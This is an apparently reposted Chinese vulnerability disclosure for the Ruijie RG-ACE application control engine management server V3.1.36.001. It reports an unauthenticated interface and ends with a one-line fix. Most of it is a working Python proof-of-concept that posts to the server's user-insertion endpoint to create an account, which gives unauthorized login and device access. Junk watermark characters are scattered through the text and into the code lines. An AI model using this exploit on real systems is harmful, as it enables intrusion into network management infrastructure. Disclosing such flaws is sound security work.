锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
5 c1 L! l! H/ d/ e( X

测试的具体版本是
产品名称: 锐捷应用控制引擎
1 a: t& N0 m8 A8 F2 @" B! `版本号: 3.1.36.001 TC
+ R8 W" Y0 h, b# v1 V! e/ ~; f( T编译时间: 201104291730
9 `+ W( f2 L+ X$ k" B3 ^# e

1 d9 W5 k2 y* y- j漏洞证明：

; D: ?/ i) ^" G3 N1 A

# B, N& P& K; c5 ?
7 V: O8 Y$ j9 x( f. l, C3 c* @

( M4 L5 _& a7 ^" X8 k执行脚本
: w) T% }1 Y$ i8 G) z#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
' s+ u% _8 u/ ~) R/ hurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
. e: y* g# z, J8 N# Qopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
$ `' x5 i: g  O# Y8 X6 \" Zopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
" @) A& x5 t0 g3 q2 r1 Vpost=(("event","userManager.doInsertUserInfo"),
. ?2 g3 e- H- @3 W3 L- r, A("useractionname","addButtonValue"),
/ L1 q6 W/ E/ X/ H% v("useropermanager","userManager"),
("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
* r6 j, f4 v( n" H9 b% d  F3 X("email",""),
("mobilePhone",""),
* z/ q0 }8 X& E9 }6 u3 \0 \% [: [6 _("officePhone",""),
! e: v3 V5 c4 H0 k3 C("addr",""),
, {* J- s9 U, a("submit","确定"))
urllib2.install_opener(opener)
) [& j* y5 }4 d* ^p=urllib2.urlopen(url, urllib.urlencode(post)).read()
' j0 M. y, b. Nprint "Done"

* c) y& O" X* q! f8 C登录，连接设备
, ]& c2 Z" c* j# h. [0 k1 X

9 F1 p+ V. U( U9 i* |
7 W! }3 D) ?8 D% ^. T
, R% V2 B3 P% o
默认的管理员admin权限更大点

8 W* H! [" Z3 C- F1 U



修复方案：
/ h( {- f, ~) y; T# C9 Q加强对接口的权限验证
& [( i6 {# D0 L; e5 E5 K
0 A4 u6 j1 H! Y9 L' f$ m8 G